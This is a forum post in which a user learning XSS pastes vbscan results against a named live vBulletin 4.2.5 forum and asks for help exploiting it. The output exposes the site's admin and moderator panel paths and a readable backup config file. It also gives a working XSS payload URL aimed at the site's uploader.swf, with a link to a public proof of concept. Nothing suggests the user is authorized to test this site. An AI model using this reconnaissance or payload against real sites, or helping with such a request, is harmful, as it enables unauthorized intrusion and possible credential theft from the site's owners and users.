Hello, so I am trying to learn how to XSS, and I scanned a site with vbscan on Kali and it turns out the forum is XSS-vulnerable. Here are the scan results.
Was hoping someone could help me in learning what to do to exploit this.
Thanks.
Code:
[+] Detecting Vbulletin based Firewall
[++] No known firewall detected
[+] Detecting vBulletin Version
[++] vBulletin 4.2.5
[+] Core Vbulletin Vulnerability
[++] Target vbulletin core is not vulnerable
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] Checking admincp/modcp path
[++] admincp Found
https://deathwishx.com/forumv2//admincp
[++] modcp Found
https://deathwishx.com/forumv2//modcp
[+] Checking validator.php
[++] validator.php is not found
[+] Checking robots.txt existing
[++] robots.txt is not found
[+] Checking c99 xml shell in admincp/subscriptions.php
[++] c99 xml shell is Not Found
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking config.php.x for disclure config file
[++] Readable config file is found
config file path : https://deathwishx.com/forumv2//includes/config.php.new
[+] Checking faq.php RCE backdoor
[++] Remote Code Execute backdoor not found
[+] Checking vBSEO 3.x - LFI (Local File Inclusion) vulnerability
[++] vbseo.php LFI is not vulnerable
[+] Checking vBulletin vBExperience 3 'sortorder' Parameter Cross Site Scripting Vulnerability
[++] xperience.php not vulnerable
[+] Checking arcade.php SQLI Vulnerability
[++] arcade.php not found
[+] Checking vBulletin YUI 2.9.0 XSS
[++] uploader.swf is vulnerable
https://deathwishx.com/forumv2//clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert(/XSS/);}//
POC : https://packetstormsecurity.com/files/124746/vBulletin-YUI-2.9.0-Cross-Site-Scripting.html
[+] Checking for html tags status
[++] HTML tag are Disable
[+] Checking Vbulletin 5.x - Remote Code Execution Exploit
[++] decodeArguments is not vulnerable